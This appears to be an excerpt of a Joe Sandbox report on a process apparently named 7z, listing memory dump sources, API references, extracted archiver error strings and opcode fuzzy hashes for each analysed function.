                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                                                                                                                                                                                                  • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                                                                                                                                                                                                  • API String ID: 3338823681-819937569
                                                                                                                                                                                                                                                  • Opcode ID: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
                                                                                                                                                                                                                                                  • Instruction ID: 5554e941f19cf0f6523b19bbe3a1559022f78d8f70a3ede078782ee841bfdf92
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 881291732186848AC720DF6AE55075EB7A5F3CAB90F504625EF9E47B59CB38C891CF40
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1de10b3c9db1c438cb2868e4062a9709d6c79681b265985f1a4863e49c1adaa6
                                                                                                                                                                                                                                                  • Instruction ID: 34837cd0fd2bbc1038085bc21b0b5d55ae558db111a5a1fe847adba2e37f4e92
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1de10b3c9db1c438cb2868e4062a9709d6c79681b265985f1a4863e49c1adaa6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA023C32209B8186DB24EF65E4903AEB365FBC5B84F584526DB8E57B69DF7CC844CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 00978F7A
                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 0097905E
                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 009790B5
                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 009790F6
                                                                                                                                                                                                                                                    • Part of subcall function 0097ABB0: GetModuleHandleW.KERNEL32 ref: 0097ABD1
                                                                                                                                                                                                                                                    • Part of subcall function 0097ABB0: GetProcAddress.KERNEL32 ref: 0097ABE1
                                                                                                                                                                                                                                                    • Part of subcall function 0097ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0097AC32
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                                                                  • String ID: ($:
                                                                                                                                                                                                                                                  • API String ID: 4250411929-4277925470
                                                                                                                                                                                                                                                  • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                                                                  • Instruction ID: 69c720ee0dc3248dc19882b55bf867ee482154dc86bbc82ce0fa3f6d0fb3a94a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C251AC23618BC19ACB20DF24F05179EB769F385758F94C526DB8E47B58EB38C4A8CB40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$DriveLogicalStrings
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 837055893-0
                                                                                                                                                                                                                                                  • Opcode ID: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
                                                                                                                                                                                                                                                  • Instruction ID: 9c44a49b3ae4efc07b8b8ea2dfe62738a3b0c25b7c4f6ce3cfa1d34c341b2017
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5431D363345A4185DA30EB26AC5936B6355BB85BE8F88C2309F6E47385DF38C846C311
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009796D1
                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00979723
                                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 0097976C
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00979779
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00979796
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 009797C4
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009797CD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ControlDeviceFileHandleInformationmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2572579059-0
                                                                                                                                                                                                                                                  • Opcode ID: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
                                                                                                                                                                                                                                                  • Instruction ID: b5d3ff030fab6a01f0a2f5661b955f0a7445137ff365da214107c2786e2acb5c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6314F33259A408AC6349F16F95076AB768F7C6BE0F58C221EBED47B95DE39C491C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Version$AddressHandleModuleProc
                                                                                                                                                                                                                                                  • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 2268189529-2102062458
                                                                                                                                                                                                                                                  • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                                                                  • Instruction ID: 8789200b6c1a17d0f8d61e88b0b20cc3f080cf1a949703ab96551b67219ada40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81F0D43560AA0292FF349B50FA643A973A4FB88B29F450235C29E412B5EF3CC649CB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                                                                  • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 1197914913-1127948838
                                                                                                                                                                                                                                                  • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                                  • Instruction ID: 3cefe2194666a8164c8c2ad9647f3b418553d11f8a103151e85aacd93a92e067
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB118C73216F4696DB11CF59F990B9AB364F7A4B90F449022EB8D03724EF38C559C700
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32 ref: 0097B12A
                                                                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32 ref: 0097B13E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                                                                  • API String ID: 1748579591-1553575800
                                                                                                                                                                                                                                                  • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                                  • Instruction ID: 7b5e229f26735b3468fed1a65e9c92bc8aacd3dcd8f74f39622dd06e3c8c59c8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10518A93B042C04BD7198B3DD846BCDBFC1E3A5758F48C22ADB5587785E26DC50AC721
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0097B5B8: GetCurrentProcess.KERNEL32 ref: 0097B5C2
                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32 ref: 0097B624
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentInfoProcessSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1098911721-0
                                                                                                                                                                                                                                                  • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                                  • Instruction ID: bf2204e8b2d779e86e239ba3ba7ed7f9e8150ba6e241014c31bba247b275d1b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92E0ED6762449483CA70DB08E952B69A364F794755FC09611E78D82E19DF2DC6548F00
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
                                                                                                                                                                                                                                                  • Instruction ID: 28c2724fb23dbda97642d8b7dd185ece33fef4764bb070aebcff4110c2f5ae3c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34068706c2d5e8e26acb18a5d787bd8c28d1e0f249bc181dd9bcec1cf4fba99d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CE042F290A2058FD3D98F6AD4412587EE4F748795B60C13FA608D3301D37581888F92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                                                                  • Instruction ID: 9cc9ff7c842044f49f5c09ada6fa6473447d7caa67160939b076c4b44a8beb1e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FD1C22326D58181DA60FF36E49176FA720F7C2784F909152FB9E93B39DE28C946CB14
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                                                                  • Instruction ID: 13f21419441e48a086a22ff36983a4cd55f5beb80e2e1d5a3bf8b7f1ea0499be
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D91393321AA8486CA24EF36E4A4B6E6764F7CBF85F46A462DB4E53711CF38C446C714
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3352498445-0
                                                                                                                                                                                                                                                  • Opcode ID: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
                                                                                                                                                                                                                                                  • Instruction ID: 8072e47d3ec676959af99f21b0b45a28f7a4bb618bc8e42bfd332018497a3075
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d8d899cfb035eb7cde2558026b141a486167347833140dff5bfb46b77e2efc0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE1B43371869096CE30FF1AE4812ADA764F3C6BD0F898126EF9D57719DE68C886C750
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                                                                  • String ID: incorrect update switch command$pqrxyzw
                                                                                                                                                                                                                                                  • API String ID: 3957182552-3922825594
                                                                                                                                                                                                                                                  • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                                  • Instruction ID: d9a48c3ee61922db76e1bc9bd38c79336dd4b49f57fb64ab17aeb9de8685d1fb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D81B633629584D2CB60FF16D8917AE7324F7C5B84F818122EB9E47765DE38C94ACB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                                                                                                                                                                                                  • String ID: Empty file path
                                                                                                                                                                                                                                                  • API String ID: 462375450-1562447899
                                                                                                                                                                                                                                                  • Opcode ID: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
                                                                                                                                                                                                                                                  • Instruction ID: f8d730960e32be85297569de68a3b4970dcb7c16b77ade321d9d42c372b45787
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 324205b252e1547a146404fd684db01b8975b469ffccedc29f4d10e25dad08a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FD1E333218A8096CB60EF26E48039EB764FBC5B94F858115EF9E47B69DF78C945CB00
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: \$\\?\$\\?\UNC\
                                                                                                                                                                                                                                                  • API String ID: 0-1962706685
                                                                                                                                                                                                                                                  • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                                  • Instruction ID: 5c70b32be224fc4311884bde1977f358c9c769f461c683bcf22c888852e36982
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
